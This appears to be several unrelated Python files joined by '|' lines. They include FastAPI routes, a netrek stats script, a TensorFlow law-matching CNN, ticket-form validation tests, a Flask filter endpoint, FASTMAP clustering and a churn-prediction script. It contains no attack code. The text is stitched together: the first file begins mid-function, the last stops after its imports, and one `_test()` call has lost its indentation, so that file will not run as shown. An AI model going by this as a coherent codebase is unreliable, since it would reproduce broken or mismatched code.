    if crud.get_supplier(db, id) is None:
        raise HTTPException(status_code=404, detail="Supplier not found")
    crud.delete_supplier(db, id)
#############################
@router.get("/shippers/{shipper_id}", response_model=schemas.Shipper)
async def get_shipper(shipper_id: PositiveInt, db: Session = Depends(get_db)):
    """Return the shipper with the given id, or raise 404 if absent."""
    shipper = crud.get_shipper(db, shipper_id)
    if shipper is None:
        raise HTTPException(status_code=404, detail="Shipper not found")
    return shipper
@router.get("/shippers", response_model=List[schemas.Shipper])
async def get_shippers(db: Session = Depends(get_db)):
    """Return the full list of shippers."""
    return crud.get_shippers(db)
#!/usr/bin/env python
# William U. Clark, Jr.
# netrek@wuclark.com
# Save one player's stats from a statdump to a file.
# usage: findPlayer.py PNUM input output
#
# Fixes vs. original: the shebang must be the first line of the file to
# have any effect; both files are managed with `with` (the input handle was
# never closed); the input is streamed line-by-line instead of loading the
# whole dump via readlines().
import sys

# Matching lines start with this tab-separated player-number prefix.
prefix = 'STATS_SP_PLAYER:\t%d\t' % int(sys.argv[1])
with open(sys.argv[2], 'r') as in_file, open(sys.argv[3], 'w') as out_file:
    for line in in_file:
        if line.startswith(prefix):
            out_file.write(line.strip() + "\n")
|
# Context-aware gate2 added to model5.
# Multi-level prior knowledge: the [1,d] score produced at one level is fed
# into the next level's computation; each level's weights are two [d,1] matrices.
import tensorflow as tf
class ModelConfig(object):
    """Hyper-parameters for the fact/law matching CNN model."""
    def __init__(self):
        self.EMBEDDING_DIM = 128  # word-embedding dimension
        self.FACT_LEN = 30  # fact sequence length
        self.LAW_LEN = 30  # law-article sequence length
        self.KS_LEN = 3  # prior-knowledge sequence length (3 levels)
        self.FILTERS = 256
        self.KERNEL_SIZE = 5  # convolution kernel size
        self.NUM_CLASS = 2  # number of output classes
        self.NUM_LAYERS = 2
        self.HIDDEN_DIM = 128
        self.LEARNING_RATE = 0.001  # learning rate
        self.batch_size = 128  # samples per training batch
        self.num_epochs = 200  # passes over the whole dataset
        self.save_per_batch = 10  # save and report every 10 training steps
        self.print_per_batch = 10
        self.dropout_keep_prob = 0.5  # keep probability: drop half the connections to curb overfitting
class CNN(object):
    """Three-channel fact/law matching network (TensorFlow 1.x static graph).

    Channel 1: context-level gate over the fact, driven by 3 levels of prior
    knowledge. Channel 2: word-level gate with the same priors. Channel 3:
    multi-layer LSTM encodings of fact and law. Attention maps between the
    fact/law features of each channel feed 1-D convolutions + global max
    pooling, and the concatenated features go to a dense classifier.
    """
    def __init__(self, config):
        print("IN RIGHT MODEL")
        self.config = config
        self.input_x1 = tf.placeholder(tf.float32, [None, self.config.FACT_LEN, self.config.EMBEDDING_DIM],
                                       name='input_x1')  # input 1: fact [ ,30,128]
        self.input_x2 = tf.placeholder(tf.float32, [None, self.config.LAW_LEN, self.config.EMBEDDING_DIM],
                                       name='input_x2')  # input 2: law article [ ,30,128]
        self.input_ks = tf.placeholder(tf.float32, [None, self.config.KS_LEN, self.config.EMBEDDING_DIM],
                                       name="input_ks")  # input 3: prior knowledge [ ,3,128]
        self.input_y = tf.placeholder(tf.int32, [None, self.config.NUM_CLASS],
                                      name='input_y')  # input 4: class labels [ ,2]
        self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
        self.cnn()
        return
    def cnn(self):
        """Assemble the full graph: gates, RNN channel, attention, classifier."""
        # Fact features from channels one and two (context gate / word gate).
        new_x1 = self.gate_con(self.input_ks, self.input_x1)
        new_x1_word = self.gate_word(self.input_ks, self.input_x1)
        # Reduce the fact features; they become the prior knowledge used when
        # extracting law features.
        new_x1_mean = self.process_fact(new_x1)
        new_x1_mean_word = self.process_fact(new_x1_word)
        # Law features from channels one and two.
        new_x2 = self.mirror_gate_con(new_x1_mean, self.input_x2)
        new_x2_word = self.mirror_gate_word(new_x1_mean_word, self.input_x2)
        # Channel three: RNN encodings of fact and law.
        x1_bi, x2_bi = self.rnn()
        # Attention between channels, convolutions, and feature concatenation.
        op = self.conv(new_x1_word, new_x2_word, new_x1, new_x2, x1_bi, x2_bi)
        # Dense classifier plus loss/accuracy ops.
        self.match(op)
    # Filter the fact content with law-related prior knowledge (context-level gate).
    def gate_con(self, ks, input_x):
        with tf.name_scope("gate_con"):
            # Randomly initialized weights.
            # NOTE(review): stddev=0 makes tf.random_normal return all zeros,
            # so these weights start at zero -- confirm this is intended.
            weight_1 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
                                                    stddev=0, seed=1), trainable=True, name='w1')
            weight_2 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
                                                    stddev=0, seed=2), trainable=True, name='w2')
            weight_3 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
                                                    stddev=0, seed=3), trainable=True, name='w3')
            # Slice out the three levels of raw prior knowledge.
            k_1_init, k_2_init, k_3_init = ks[:, 0, :], ks[:, 1, :], ks[:, 2, :]
            k_1 = tf.reshape(tf.keras.backend.repeat_elements(k_1_init, rep=self.config.FACT_LEN, axis=1),
                             shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
            k_2 = tf.reshape(tf.keras.backend.repeat_elements(k_2_init, rep=self.config.FACT_LEN, axis=1),
                             shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
            k_3 = tf.reshape(tf.keras.backend.repeat_elements(k_3_init, rep=self.config.FACT_LEN, axis=1),
                             shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
            # Context-aware linear transform of the fact.
            fun1 = tf.einsum('abd,bde->abe', input_x, weight_1)
            fun2 = tf.transpose(fun1, perm=[0, 2, 1])
            fun3 = tf.reduce_mean(fun2, axis=2, keep_dims=True)
            fun3_epd = tf.expand_dims(fun3, axis=2)
            # Apply the level-2 prior knowledge to the fact.
            # [ ,30,1,128]
            ksw_1 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun3_epd, k_2)))
            # Context-aware linear transform of the fact.
            fun4 = tf.einsum('abd,bde->abe', input_x, weight_2)
            fun5 = tf.transpose(fun4, perm=[0, 2, 1])
            fun6 = tf.reduce_mean(fun5, axis=2, keep_dims=True)
            fun6_epd = tf.expand_dims(fun6, axis=2)
            fun6_epd1 = tf.keras.backend.repeat_elements(fun6_epd, rep=2, axis=3)
            # print('fun6:', fun6_epd1.shape,flush=True)
            # Level-3 prior knowledge together with the previous gate output
            # act as the prior applied to the fact.
            ksw_2 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun6_epd1, tf.concat([k_3, ksw_1], axis=2))))
            # Context-aware linear transform of the fact.
            fun7 = tf.einsum('abd,bde->abe', input_x, weight_3)
            fun8 = tf.transpose(fun7, perm=[0, 2, 1])
            fun9 = tf.reduce_mean(fun8, axis=2, keep_dims=True)
            fun9_epd = tf.expand_dims(fun9, axis=2)
            fun9_epd1 = tf.keras.backend.repeat_elements(fun9_epd, rep=2, axis=3)
            # Level-1 prior knowledge together with the previous gate output
            # act as the prior applied to the fact.
            ksw_3 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun9_epd1, tf.concat([k_1, ksw_2], axis=2))))
            input_x_epd = tf.expand_dims(input_x, axis=2)
            # Combine the three gates and scale the input.
            n_vector_ = (ksw_1 + ksw_2 + ksw_3) * input_x_epd
            n_vector = tf.reshape(n_vector_, shape=[-1, self.config.FACT_LEN, self.config.EMBEDDING_DIM])
            return n_vector
    def gate_word(self, ks, input_x):
        """Word-level gate: same 3-level prior scheme, word-wise weights."""
        with tf.name_scope("gate_word"):
            # NOTE(review): stddev=0 -> zero-initialized weights (see gate_con).
            weight_1 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 1],
                                                    stddev=0, seed=1), trainable=True, name='w1')
            weight_2 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 2],
                                                    stddev=0, seed=2), trainable=True, name='w2')
            weight_3 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 2],
                                                    stddev=0, seed=3), trainable=True, name='w3')
            k_1_init, k_2_init, k_3_init = ks[:, 0, :], ks[:, 1, :], ks[:, 2, :]  # slice prior-knowledge rows 0, 1, 2
            k_1 = tf.reshape(tf.keras.backend.repeat_elements(k_1_init, rep=self.config.FACT_LEN, axis=1),
                             shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])  # reshape to [ ,30,1,128]
            k_2 = tf.reshape(tf.keras.backend.repeat_elements(k_2_init, rep=self.config.FACT_LEN, axis=1),
                             shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
            k_3 = tf.reshape(tf.keras.backend.repeat_elements(k_3_init, rep=self.config.FACT_LEN, axis=1),
                             shape=[-1, self.config.FACT_LEN, 1, self.config.EMBEDDING_DIM])
            input_x_epd = tf.expand_dims(input_x, axis=2)
            # fun1[a,b,c,e]=input_x_epd[a,b,c,d]*weight_1[d,e]
            fun1 = tf.einsum('abcd,de->abce', input_x_epd, weight_1)  # fact times weights
            ksw_1 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun1, k_2)))
            # fun2[ ,30,1,2]
            fun2 = tf.einsum('abcd,de->abce', input_x_epd, weight_2)
            # print('fun2:', fun2.shape, flush=True)
            # print('k_3:', k_3.shape, flush=True)
            # print('ksw_1:', ksw_1.shape, flush=True)
            ksw_2 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun2, tf.concat([k_3, ksw_1], axis=2))))
            # fun3[a,b,c,e]=input_x_epd[a,b,c,d]*weight_3[d,e]
            fun3 = tf.einsum('abcd,de->abce', input_x_epd, weight_3)
            ksw_3 = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abdf->abcf', fun3, tf.concat([k_1, ksw_2], axis=2))))
            # Combine the three gates and scale the input.
            n_vector_ = (ksw_1 + ksw_2 + ksw_3) * input_x_epd
            n_vector = tf.reshape(n_vector_, shape=[-1, self.config.FACT_LEN, self.config.EMBEDDING_DIM])
            return n_vector
    def process_fact(self, input_x):
        """Compress gated fact features to a [batch, dim] summary vector."""
        with tf.name_scope("FactProcess"):
            input_x_ = tf.transpose(input_x, perm=[0, 2, 1])
            # Top-5 values of each row of input_x_; [0] keeps the values and
            # drops the indices.
            input_x_k = tf.transpose((tf.nn.top_k(input_x_, k=5, sorted=False))[0], perm=[0, 2, 1])
            input_x_mean = tf.reduce_mean(input_x_k, axis=1)
            return input_x_mean
    # Filter the law article using the fact summary as prior knowledge.
    def mirror_gate_con(self, input_x, input_y):
        with tf.name_scope("Fact2Law"):
            # NOTE(review): stddev=0 -> zero-initialized weights (see gate_con).
            weight_1 = tf.Variable(tf.random_normal([30, self.config.EMBEDDING_DIM, 30],
                                                    stddev=0, seed=1), trainable=True, name='w1')
            ss_epd = tf.reshape(tf.keras.backend.repeat_elements(input_x, rep=self.config.LAW_LEN, axis=1),
                                shape=[-1, self.config.LAW_LEN, 1, self.config.EMBEDDING_DIM])
            law_epd = tf.expand_dims(input_y, axis=2)
            # Linear transform.
            fun = tf.einsum('abd,bde->abe', input_y, weight_1)
            fun1 = tf.transpose(fun, perm=[0, 2, 1])
            fun2 = tf.reduce_mean(fun1, axis=2, keep_dims=True)
            fun2_epd = tf.expand_dims(fun2, axis=2)
            # Gate the law content with the fact acting as prior knowledge.
            ksw = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abde->abce', fun2_epd, ss_epd)))
            n_vector_ = ksw * law_epd
            n_vector = tf.reshape(n_vector_, shape=tf.shape(input_y))
            return n_vector
    def mirror_gate_word(self, input_x, input_y):
        """Word-level analogue of mirror_gate_con."""
        with tf.name_scope("Fact2Law_word"):
            # NOTE(review): stddev=0 -> zero-initialized weights (see gate_con).
            weight_1 = tf.Variable(tf.random_normal([self.config.EMBEDDING_DIM, 1],
                                                    stddev=0, seed=1), trainable=True, name='w1')
            ss_epd = tf.reshape(tf.keras.backend.repeat_elements(input_x, rep=self.config.LAW_LEN, axis=1),
                                shape=[-1, self.config.LAW_LEN, 1, self.config.EMBEDDING_DIM])  # [b,l,1,d]
            # Expand the law input to [ ,30,1,128].
            law_epd = tf.expand_dims(input_y, axis=2)
            # fun[a,b,c,e] = law_epd[a,b,c,d]*weight_1[d,e]
            fun = tf.einsum('abcd,de->abce', law_epd, weight_1)
            # [a,b,c,e] = fun[a,b,c,d]*ss_epd[a,b,d,e] passed through relu then sigmoid gives ksw
            ksw = tf.sigmoid(tf.nn.relu(tf.einsum('abcd,abde->abce', fun, ss_epd)))
            # Output shape [ ,30,128].
            n_vector_ = ksw * law_epd
            n_vector = tf.reshape(n_vector_, shape=tf.shape(input_y))
            return n_vector
    def lstm_cell(self):  # LSTM cell
        return tf.contrib.rnn.BasicLSTMCell(self.config.HIDDEN_DIM, state_is_tuple=True)
    def dropout(self):  # wrap each RNN cell with a dropout layer
        cell = self.lstm_cell()
        return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=self.keep_prob)
    def rnn(self):
        """Channel 3: independent multi-layer LSTMs over fact and law."""
        with tf.name_scope("rnn1"):
            # Multi-layer RNN.
            with tf.variable_scope("rnn1v"):
                cells_1 = [self.dropout() for _ in range(self.config.NUM_LAYERS)]
                rnn_cell_1 = tf.contrib.rnn.MultiRNNCell(cells_1, state_is_tuple=True)
                _outputs_1, state_1 = tf.nn.dynamic_rnn(cell=rnn_cell_1, inputs=self.input_x1, dtype=tf.float32,
                                                        time_major=False)
                # time_major=False means inputs/outputs are shaped [batch_size, max_time, depth]
        with tf.name_scope("rnn2"):
            # Multi-layer RNN.
            with tf.variable_scope("rnn2v"):
                cells_2 = [self.dropout() for _ in range(self.config.NUM_LAYERS)]
                rnn_cell_2 = tf.contrib.rnn.MultiRNNCell(cells_2, state_is_tuple=True)
                _outputs_2, state_2 = tf.nn.dynamic_rnn(cell=rnn_cell_2, inputs=self.input_x2, dtype=tf.float32,
                                                        time_major=False)
                # time_major=False means inputs/outputs are shaped [batch_size, max_time, depth]
        return _outputs_1, _outputs_2
    # Build the convolutions over the attention maps.
    # The RNN channel has shape [128,30,256]; the other two are [128,30,128].
    def conv(self, x_word, y_word, input_x, input_y, x_bi, y_bi):
        with tf.name_scope("attention"):
            # Attention over the three pairs of channel features.
            dot1 = tf.matmul(x_bi, y_bi, adjoint_b=True)
            self.beta1 = tf.nn.softmax(dot1, axis=2)
            self.alpha1 = tf.nn.softmax(dot1, axis=1)
            dot2 = tf.matmul(x_word, y_word, adjoint_b=True)
            self.beta2 = tf.nn.softmax(dot2, axis=2)
            self.alpha2 = tf.nn.softmax(dot2, axis=1)
            dot3 = tf.matmul(input_x, input_y, adjoint_b=True)
            self.beta3 = tf.nn.softmax(dot3, axis=2)
            self.alpha3 = tf.nn.softmax(dot3, axis=1)
        with tf.name_scope('cnn1'):
            conv1 = tf.layers.conv1d(self.beta1, self.config.FILTERS, self.config.KERNEL_SIZE, name='conv1')
            gmp1 = tf.reduce_max(conv1, reduction_indices=[1], name='gmp1')
        with tf.name_scope('cnn2'):
            conv2 = tf.layers.conv1d(self.alpha1, self.config.FILTERS, self.config.KERNEL_SIZE, name='conv2')
            gmp2 = tf.reduce_max(conv2, reduction_indices=[1], name='gmp2')
        with tf.name_scope("cnn3"):
            # CNN layer
            with tf.variable_scope("cnn-var1"):
                conv3 = tf.layers.conv1d(self.input_x1, self.config.FILTERS, self.config.KERNEL_SIZE,
                                         name='conv3')  # (?,26,256)
                gmp3 = tf.reduce_max(conv3, reduction_indices=[1], name='gmp3')  # (?,256)
        with tf.name_scope("cnn4"):
            # CNN layer
            with tf.variable_scope("cnn-var2"):
                conv4 = tf.layers.conv1d(self.input_x2, self.config.FILTERS, self.config.KERNEL_SIZE,
                                         name='conv4')  # (?,46,256)
                gmp4 = tf.reduce_max(conv4, reduction_indices=[1], name='gmp4')  # (?,256)
        with tf.name_scope("cnn5"):
            conv5 = tf.layers.conv1d(self.beta2, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
                                     name='conv5')
            gmp5 = tf.reduce_max(conv5, reduction_indices=[1], name='gmp5')
        with tf.name_scope("cnn6"):
            conv6 = tf.layers.conv1d(self.alpha2, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
                                     name='conv6')
            gmp6 = tf.reduce_max(conv6, reduction_indices=[1], name='gmp6')
        with tf.name_scope("cnn7"):
            conv7 = tf.layers.conv1d(self.beta3, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
                                     name='conv7')
            gmp7 = tf.reduce_max(conv7, reduction_indices=[1], name='gmp7')
        with tf.name_scope("cnn8"):
            conv8 = tf.layers.conv1d(self.alpha3, filters=self.config.FILTERS, kernel_size=self.config.KERNEL_SIZE,
                                     name='conv8')
            gmp8 = tf.reduce_max(conv8, reduction_indices=[1], name='gmp8')
        with tf.name_scope("concat"):
            concat = tf.concat([gmp1, gmp2, gmp5, gmp6, gmp7, gmp8, gmp3, gmp4], 1)
        return concat
    # op has shape [128,256*8] after concatenation of the pooled features.
    def match(self, op):
        """Dense classifier head with loss, optimizer, and accuracy ops."""
        with tf.name_scope("match_c3"):
            fc = tf.layers.dense(inputs=op, units=self.config.HIDDEN_DIM, name="fc3_3")
            fc = tf.contrib.layers.dropout(fc, self.keep_prob)
            fc = tf.nn.relu(fc)
            # Classifier.
            self.logits = tf.layers.dense(fc, self.config.NUM_CLASS,
                                          name='fc4_3')
            # softmax maps the logits to probabilities; argmax picks the index
            # of the most probable class.
            self.y_pred_cls = tf.argmax(tf.nn.softmax(self.logits), 1)
        with tf.name_scope("optimize_c3"):
            cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits,
                                                                    labels=self.input_y)
            # Cross entropy.
            self.loss = tf.reduce_mean(cross_entropy)
            # Optimizer.
            self.optim = tf.train.AdamOptimizer(learning_rate=self.config.LEARNING_RATE).minimize(self.loss)
        with tf.name_scope("accuracy_c3"):
            # Accuracy.
            correct_pred = tf.equal(tf.argmax(self.input_y, 1),
                                    self.y_pred_cls)
            self.acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
|
import unittest
from src.dl.flaskapp.transactions.parsers.transaction_factory import TransactionReaderFactory
from src.dl.flaskapp.transactions.parsers.csv_readers import CapitalOneAutoDataReader
class TransactionFactoryTest(unittest.TestCase):
    """Verifies TransactionReaderFactory picks the right reader for a file."""
    def test_is_capital_one_auto_trans(self):
        # NOTE(review): this absolute path only exists on the original
        # author's machine -- consider a repo-relative fixture. TODO confirm
        # whether the factory decides by filename alone or opens the file.
        the_reader = TransactionReaderFactory.get_transaction_reader("/Users/Paul/Downloads/data/coa.csv")
        self.assertIsNotNone(the_reader)
        self.assertTrue(isinstance(the_reader, CapitalOneAutoDataReader))
|
'''
Test requirements according to R4
'''
from unittest.mock import patch
from qa327_test.conftest import base_url
from qa327_test.frontend.geek_base import GeekBaseCase, TEST_USER
from qa327.models import Ticket
from qa327.ticket_format import parse_date
# Test Information
# Baseline well-formed ticket reused by every positive and negative case.
GOOD_TICKET = Ticket(
    name='helloworld',
    seller_id='1',
    price='20',
    quantity='20',
    expires="20220101"
)
# Expected profile-page rendering of GOOD_TICKET after a successful sale.
GOOD_TICKET_DICT = [{'name': 'helloworld', 'price': '20', 'owner': 'jesus', 'quantity': '20'}]
# Names rejected by r4.1/r4.2: leading/trailing spaces, special characters,
# and over-long names.
INVALID_NAME_FORMATS = ['bad', ' alsobad', 'alsobad ', '$alsobad$',
                        'veeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeerylongname']
# Quantities outside the allowed range (r4.3).
INVALID_QUANTITIES = ['-1', '101']
# Prices outside the allowed range (r4.4).
INVALID_PRICES = ['5', '101']
# Expiration dates with bad format or in the past (r4.5).
INVALID_DATES = ['January 1 2024', '20200204']
class R4Test(GeekBaseCase):
    '''
    Contains test cases specific to R4
    '''

    def _submit_sell_form(self, name, quantity, price, date):
        '''Fill every field of the sell form and submit it.'''
        self.input('#sell-ticket-name', name)
        self.input('#sell-ticket-quantity', quantity)
        self.input('#sell-ticket-price', price)
        self.input('#sell-ticket-expiration-date', date)
        self.click('#sell-submit')

    @patch('qa327.backend.get_user', return_value=TEST_USER)
    def test_ticket_name(self, *_):
        '''
        See r4.1/r4.2 - Negative
        Checks all invalid formats with spaces, special characters,
        and name length
        '''
        self.login_test_user()
        self.open(base_url)
        for bad_name in INVALID_NAME_FORMATS:
            self._submit_sell_form(bad_name, GOOD_TICKET.quantity,
                                   GOOD_TICKET.price, '20220101')
            self.assert_flash('Invalid ticket name')

    @patch('qa327.backend.get_user', return_value=TEST_USER)
    def test_ticket_quantity(self, *_):
        '''
        See r4.3 - Negative
        Checks all invalid ticket quantities
        '''
        self.login_test_user()
        self.open(base_url)
        for bad_quantity in INVALID_QUANTITIES:
            self._submit_sell_form(GOOD_TICKET.name, bad_quantity,
                                   GOOD_TICKET.price, '20220101')
            self.assert_flash('Invalid ticket quantity')

    @patch('qa327.backend.get_user', return_value=TEST_USER)
    def test_ticket_price(self, *_):
        '''
        See r4.4 - Negative
        Checks all invalid ticket prices
        '''
        self.login_test_user()
        self.open(base_url)
        for bad_price in INVALID_PRICES:
            self._submit_sell_form(GOOD_TICKET.name, GOOD_TICKET.quantity,
                                   bad_price, '20220101')
            self.assert_flash('Invalid ticket price')

    @patch('qa327.backend.get_user', return_value=TEST_USER)
    def test_ticket_date(self, *_):
        '''
        See r4.5 - Negative
        Checks all invalid ticket expiration dates
        '''
        self.login_test_user()
        self.open(base_url)
        for bad_date in INVALID_DATES:
            self._submit_sell_form(GOOD_TICKET.name, GOOD_TICKET.quantity,
                                   GOOD_TICKET.price, bad_date)
            self.assert_flash('Invalid ticket date')

    @patch('qa327.backend.get_user', return_value=TEST_USER)
    @patch('qa327.backend.sell_ticket', return_value='ticket sold successfully')
    @patch('qa327.backend.get_all_tickets')
    def test_good_ticket(self, get_all_tickets_function, *_):
        '''
        See r4.6
        Ticket with proper format will be posted to profile page
        '''
        self.login_test_user()
        self.open(base_url)
        get_all_tickets_function.return_value = []
        self._submit_sell_form(GOOD_TICKET.name, GOOD_TICKET.quantity,
                               GOOD_TICKET.price, GOOD_TICKET.expires)
        self.assert_flash('ticket sold successfully')
        # After the sale, the mocked backend now reports the ticket; the
        # refreshed profile page must render every property of it.
        get_all_tickets_function.return_value = GOOD_TICKET_DICT
        self.refresh()
        ticket_name = GOOD_TICKET.name
        ticket_div = self.find_element(f'#tickets .ticket[name={ticket_name}]')
        for prop, value in GOOD_TICKET_DICT[0].items():
            displayed_text = ticket_div.find_element_by_class_name(prop).text
            self.assertEqual(displayed_text, str(value))
|
import database
from flask import Blueprint, make_response, json, request
import pymongo
from bson.objectid import ObjectId
# Blueprint Configuration
# All routes in this module hang off the site root.
doc_bp = Blueprint('sort_bp', __name__,
                   template_folder='templates',
                   static_folder='build/',
                   url_prefix='/')
# Shared database accessor used by every route in this blueprint.
db = database.Database()
@doc_bp.route('/filter/<string:which>/<string:criteria>', methods=['GET'])
def filters(which, criteria):
    """Return documents matching `criteria` on field `which`, as JSON."""
    documents = db.filter(which, criteria)
    # ObjectId is not JSON-serializable, so stringify each document id.
    for document in documents:
        document['_id'] = str(document['_id'])
    payload = json.dumps(documents)
    response = make_response(
        payload, 200, {'Content-Type': 'application/json'})
    response.headers['Access-Control-Allow-Origin'] = '*'
    return response
|
from __future__ import division, print_function
from pdb import set_trace
import pandas as pd
import numpy as np
from os import walk
from random import randint as randi, seed as rseed
__author__ = 'rkrsn'
def where(data):
    """
    Recursive FASTMAP clustering.

    Repeatedly projects the rows onto the line through two far-apart pivot
    rows and splits at the median until each partition has fewer than
    sqrt(N) rows. The last column is treated as the class label and is
    excluded from distance computations.

    :param data: pandas DataFrame or numpy 2-D array; rows are instances.
    :return: list of numpy row-lists (the leaf clusters).
    :raises TypeError: if `data` is neither a DataFrame nor an ndarray.

    Fix vs. original: DataFrame.as_matrix() was removed in pandas 1.0;
    `.values` is the backward- and forward-compatible equivalent.
    """
    rseed(0)  # deterministic pivot choice across runs
    if isinstance(data, pd.core.frame.DataFrame):
        data = data.values
    if not isinstance(data, np.ndarray):
        raise TypeError('Incorrect data.dat format. Must be a pandas data.dat Frame, or a numpy nd-array.')
    N = np.shape(data)[0]
    clusters = []
    # Per-column value ranges (class column excluded) used to normalize distances.
    norm = np.max(data, axis=0)[:-1] - np.min(data, axis=0)[:-1]

    def aDist(one, two):
        # Euclidean distance over range-normalized features, label dropped.
        return np.sqrt(np.sum((np.array(one[:-1])/norm-np.array(two[:-1])/norm)**2))

    def farthest(one, rest):
        return sorted(rest, key=lambda F: aDist(F, one))[-1]

    def recurse(dataset):
        R, C = np.shape(dataset)  # No. of Rows and Col
        # FASTMAP pivot heuristic: random row -> farthest from it -> farthest
        # from that, giving two approximately most-distant points.
        one = dataset[randi(0, R - 1)]
        mid = farthest(one, dataset)
        two = farthest(mid, dataset)

        # Project each case onto the pivot line (cosine rule).
        def proj(test):
            a = aDist(one, test)
            b = aDist(two, test)
            c = aDist(one, two)
            return (a**2-b**2+c**2)/(2*c)

        if R < np.sqrt(N):
            clusters.append(dataset)
        else:
            _ = recurse(sorted(dataset, key=lambda F: proj(F))[:int(R/2)])
            _ = recurse(sorted(dataset, key=lambda F: proj(F))[int(R/2):])

    recurse(data)
    return clusters
def _test(dir='../data.dat/Jureczko/ant/'):
    """Smoke-test `where` on a Jureczko project: cluster all-but-last CSVs.

    NOTE(review): `dir` shadows the builtin; kept for interface stability.
    """
    files=[]
    for (dirpath, _, filename) in walk(dir):
        for f in filename:
            df=pd.read_csv(dirpath+f)
            # Keep only columns whose header does not contain '?' (meta columns).
            headers = [h for h in df.columns if '?' not in h]
            files.append(df[headers])
    "For N files in a project, use 1 to N-1 as train."
    train = pd.concat(files[:-1])
    clusters = where(train)
    # ----- ::DEBUG:: -----
    set_trace()  # intentional breakpoint: inspect `clusters` interactively
if __name__=='__main__':
_test() |
# --------------
import pandas as pd
from sklearn.model_selection import train_test_split
#path - Path of file (supplied by the execution environment)
# Code starts here
df = pd.read_csv(path)
# Drop the row identifier and the target from the feature matrix.
# Fix: keyword `axis=1` -- the positional axis argument to DataFrame.drop
# was deprecated and removed in pandas 2.0.
X = df.drop(['customerID', 'Churn'], axis=1)
y = df['Churn'].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)
# --------------
import numpy as np
from sklearn.preprocessing import LabelEncoder
# Code starts here
# 'TotalCharges' arrives as strings where a single blank means "missing".
# Fix: np.nan -- the np.NaN alias was removed in numpy 2.0.
X_train['TotalCharges'] = X_train['TotalCharges'].replace({' ': np.nan})
X_test['TotalCharges'] = X_test['TotalCharges'].replace({' ': np.nan})
X_train['TotalCharges'] = X_train['TotalCharges'].astype(float)
X_test['TotalCharges'] = X_test['TotalCharges'].astype(float)
# NOTE(review): test NaNs are filled with the *test* mean, as in the
# original; filling with the train mean would avoid test-set leakage.
X_train['TotalCharges'].fillna(value=np.mean(X_train['TotalCharges']), inplace=True)
X_test['TotalCharges'].fillna(value=np.mean(X_test['TotalCharges']), inplace=True)
print(X_train['TotalCharges'].isnull().sum())
print(X_test['TotalCharges'].isnull().sum())
le = LabelEncoder()
cat_col = list(X_train.select_dtypes(include='object').columns)
for i in cat_col:
    X_train[i] = le.fit_transform(X_train[i])
    # Fix: reuse the mapping fitted on train. The original called
    # fit_transform on the test column too, which can assign different
    # integers to the same category whenever the label sets differ.
    # (le.transform raises on categories unseen in train -- a loud failure
    # instead of a silently inconsistent encoding.)
    X_test[i] = le.transform(X_test[i])
y_train = y_train.replace({'No': 0, 'Yes': 1})
y_test = y_test.replace({'No': 0, 'Yes': 1})
# --------------
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score,classification_report,confusion_matrix
# Code starts here
# Sanity-check the prepared splits before fitting.
for frame in (X_train, y_train, X_test, y_test):
    print(frame.head())
# Fit an AdaBoost baseline and report accuracy, confusion matrix, and
# the per-class classification report.
ada_model = AdaBoostClassifier(random_state=0)
ada_model.fit(X_train, y_train)
y_pred = ada_model.predict(X_test)
ada_score = accuracy_score(y_test, y_pred)
print(ada_score)
ada_cm = confusion_matrix(y_test, y_pred)
print(ada_cm)
ada_cr = classification_report(y_test, y_pred)
print(ada_cr)
# --------------
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
#Parameter list
parameters={'learning_rate':[0.1,0.15,0.2,0.25,0.3],
            'max_depth':range(1,3)}
# Code starts here
#XGBoost
# Plain XGBoost baseline: fit, predict, and report the usual metrics.
xgb_model = XGBClassifier(random_state=0)
xgb_model.fit(X_train, y_train)
y_pred = xgb_model.predict(X_test)
xgb_score = accuracy_score(y_test, y_pred)
xgb_cm = confusion_matrix(y_test, y_pred)
xgb_cr = classification_report(y_test, y_pred)
print("XGBoost:-")
print("Accuracy: ",xgb_score)
print('Confusion matrix: \n',xgb_cm)
print('Classification report: \n',xgb_cr)
#GridSearchCV
# Grid-search learning rate and depth over the same estimator, then report
# the metrics of the best refit model.
clf_model = GridSearchCV(estimator=xgb_model, param_grid=parameters)
clf_model.fit(X_train, y_train)
y_pred = clf_model.predict(X_test)
clf_score = accuracy_score(y_test, y_pred)
clf_cm = confusion_matrix(y_test, y_pred)
clf_cr = classification_report(y_test, y_pred)
print("GridSearchCV:-")
print("Accuracy: ",clf_score)
print('Confusion matrix: \n',clf_cm)
print('Classification report: \n',clf_cr)
|
import collections
import json
from typing import Dict, NamedTuple
import torch
import torch.distributed as dist
import torch.nn as nn
from absl import app
from absl import flags
from absl import logging
from torch.utils.data import distributed as dist_data
import trainer
import utils.tensorboard as tb
from data import data
from hydraulics import boundary
